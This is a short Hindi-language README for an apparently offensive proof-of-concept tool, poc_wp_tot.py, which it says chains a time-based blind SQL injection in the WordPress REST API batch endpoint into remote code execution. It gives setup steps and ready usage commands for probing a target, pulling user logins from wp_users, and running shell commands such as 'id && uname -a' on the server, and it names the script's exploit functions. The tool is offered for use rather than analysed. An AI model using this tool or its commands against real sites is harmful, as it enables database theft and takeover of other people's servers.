
CVE-2026-63030 और CVE-2026-60137 Wp2shell Poc
poc_wp_tot.py एक प्रूफ-ऑफ-कॉन्सेप्ट (PoC) है जो WordPress REST API के batch endpoint पर समय-आधारित ब्लाइंड SQL इंजेक्शन भेद्यता का शोषण करता है, और रिमोट कोड निष्पादन (RCE) तक श्रृंखला वृद्धि करता है।
poc_wp_tot.py को अपनी कार्य निर्देशिका में क्लोन या कॉपी करें।python3 -m venv venv
source venv/bin/activate

स्क्रिप्ट तीन ऑपरेशन मोड प्रदान करती है: प्रोब (पता लगाना), एक्सट्रैक्ट (डेटा प्राप्त करना), और आरसीई (कमांड चलाना)। उपयोग के उदाहरण नीचे दिए गए हैं।
python3 poc_wp_tot.py https://target.example.com/
python3 poc_wp_tot.py -v https://target.example.com/ "SELECT user_login FROM wp_users LIMIT 1"
python3 poc_wp_tot.py https://target.example.com/ -c "id && uname -a"
-h, --help : सहायता संदेश प्रदर्शित करें-v, --verbose: वर्बोज़ आउटपुट सक्षम करें (डीबग)-c <COMMAND> : आरसीई मोड — लक्ष्य पर शेल कमांड चलाएँSLEEP() फ़ंक्शन को बूलियन स्थिति के रूप में निष्पादित करने का कारण बनता है (समय-आधारित ब्लाइंड SQLi)।poc_wp_tot.py में है।calibrate(), get_scalar(), और exploit_rce() फ़ंक्शन देखें।